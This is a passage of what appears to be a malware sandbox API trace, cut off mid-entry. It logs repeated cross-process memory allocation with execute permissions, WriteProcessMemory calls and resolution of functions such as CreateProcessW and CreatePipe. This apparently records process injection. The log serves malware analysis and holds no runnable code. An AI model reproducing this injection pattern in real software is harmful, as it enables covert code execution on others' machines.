ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.872] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.872] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3c0 | out: hHeap=0x2150000) returned 1 [0189.872] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.873] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0189.873] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0189.873] lstrlenA (lpString="FindFirstFileW") returned 14 [0189.873] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0189.873] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adaeb2*, nSize=0xf, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adaeb2*, lpNumberOfBytesWritten=0xcdac8*=0xf) returned 1 [0189.873] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.873] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3c0 [0189.873] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0189.874] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf3c0*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf3c0*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0189.874] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0189.874] ResetEvent (hEvent=0x640) returned 1 [0189.874] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0189.875] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.875] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.875] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3c0 | out: hHeap=0x2150000) returned 1 [0189.875] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.875] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0189.875] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0189.875] lstrlenA (lpString="ReadFile") returned 8 [0189.875] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0189.876] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adaec4*, nSize=0x9, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adaec4*, lpNumberOfBytesWritten=0xcdac8*=0x9) returned 1 [0189.878] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.878] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acefd0 [0189.878] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0189.878] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acefd0*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acefd0*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0189.879] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0189.879] ResetEvent (hEvent=0x640) returned 1 [0189.879] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0189.879] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.879] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.879] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acefd0 | out: hHeap=0x2150000) returned 1 [0189.879] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.880] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0189.880] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0189.880] lstrlenA (lpString="PeekNamedPipe") returned 13 [0189.880] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0189.880] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adaed0*, nSize=0xe, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adaed0*, lpNumberOfBytesWritten=0xcdac8*=0xe) returned 1 [0189.880] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.881] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3c0 [0189.881] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0189.881] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf3c0*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf3c0*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0189.881] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0189.881] ResetEvent (hEvent=0x640) returned 1 [0189.881] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0189.882] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.882] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.882] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3c0 | out: hHeap=0x2150000) returned 1 [0189.882] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.882] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0189.882] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0189.882] lstrlenA (lpString="GetExitCodeProcess") returned 18 [0189.882] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0189.883] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adaee0*, nSize=0x13, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adaee0*, lpNumberOfBytesWritten=0xcdac8*=0x13) returned 1 [0189.883] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.883] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3c0 [0189.883] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0189.883] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf3c0*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf3c0*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0189.884] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0189.884] ResetEvent (hEvent=0x640) returned 1 [0189.884] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0189.884] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.884] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.884] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3c0 | out: hHeap=0x2150000) returned 1 [0189.885] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.885] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0189.885] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0189.885] lstrlenA (lpString="CreateProcessW") returned 14 [0189.885] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0189.885] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adaef6*, nSize=0xf, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adaef6*, lpNumberOfBytesWritten=0xcdac8*=0xf) returned 1 [0189.886] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.886] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfa50 [0189.886] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0189.886] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acfa50*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acfa50*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0189.886] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0189.887] ResetEvent (hEvent=0x640) returned 1 [0189.887] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0189.887] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.887] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.887] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acfa50 | out: hHeap=0x2150000) returned 1 [0189.887] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.887] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0189.887] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0189.888] lstrlenA (lpString="GetSystemDirectoryW") returned 19 [0189.888] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0189.888] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adaf08*, nSize=0x14, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adaf08*, lpNumberOfBytesWritten=0xcdac8*=0x14) returned 1 [0189.888] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.888] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3c0 [0189.888] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0189.888] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf3c0*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf3c0*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0189.889] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0189.889] ResetEvent (hEvent=0x640) returned 1 [0189.889] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0189.889] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.889] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.890] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3c0 | out: hHeap=0x2150000) returned 1 [0189.890] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.890] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0189.890] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0189.890] lstrlenA (lpString="SetHandleInformation") returned 20 [0189.890] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0189.890] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adaf1e*, nSize=0x15, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adaf1e*, lpNumberOfBytesWritten=0xcdac8*=0x15) returned 1 [0189.891] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.891] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf840 [0189.891] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0189.891] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf840*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf840*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0189.891] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0189.892] ResetEvent (hEvent=0x640) returned 1 [0189.892] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0189.894] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.894] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.894] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf840 | out: hHeap=0x2150000) returned 1 [0189.894] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.895] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0189.895] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0189.895] lstrlenA (lpString="CreatePipe") returned 10 [0189.895] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0xb, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0189.895] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adaf36*, nSize=0xb, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adaf36*, lpNumberOfBytesWritten=0xcdac8*=0xb) returned 1 [0189.895] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.895] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf4e0 [0189.895] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0189.896] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf4e0*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf4e0*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0189.896] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0189.896] ResetEvent (hEvent=0x640) returned 1 [0189.896] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0189.897] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.897] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.897] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf4e0 | out: hHeap=0x2150000) returned 1 [0189.897] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.897] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0189.897] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0189.897] lstrlenA (lpString="WideCharToMultiByte") returned 19 [0189.897] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0189.898] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adaf44*, nSize=0x14, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adaf44*, lpNumberOfBytesWritten=0xcdac8*=0x14) returned 1 [0189.898] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.898] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf9c0 [0189.898] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0189.898] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf9c0*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf9c0*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0189.899] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0189.899] ResetEvent (hEvent=0x640) returned 1 [0189.899] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0189.899] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.899] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.900] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf9c0 | out: hHeap=0x2150000) returned 1 [0189.900] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.900] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0189.900] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0189.900] lstrlenA (lpString="lstrlenW") returned 8 [0189.900] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0189.900] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adaf5a*, nSize=0x9, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adaf5a*, lpNumberOfBytesWritten=0xcdac8*=0x9) returned 1 [0189.900] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.901] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf840 [0189.901] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0189.901] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf840*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf840*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0189.902] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0189.902] ResetEvent (hEvent=0x640) returned 1 [0189.902] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0189.903] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.903] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.903] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf840 | out: hHeap=0x2150000) returned 1 [0189.903] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.903] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0189.903] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0189.903] lstrlenA (lpString="Sleep") returned 5 [0189.903] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x6, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0189.904] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adad88*, nSize=0x6, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adad88*, lpNumberOfBytesWritten=0xcdac8*=0x6) returned 1 [0189.904] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.904] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf840 [0189.904] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0189.904] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf840*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf840*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0189.905] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0189.905] ResetEvent (hEvent=0x640) returned 1 [0189.905] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0189.905] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.905] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.905] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf840 | out: hHeap=0x2150000) returned 1 [0189.905] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.906] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0189.906] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0189.906] lstrlenA (lpString="ExitProcess") returned 11 [0189.906] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0189.906] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adad7a*, nSize=0xc, lpNumberOfBytesWritten=0xcdac8 | 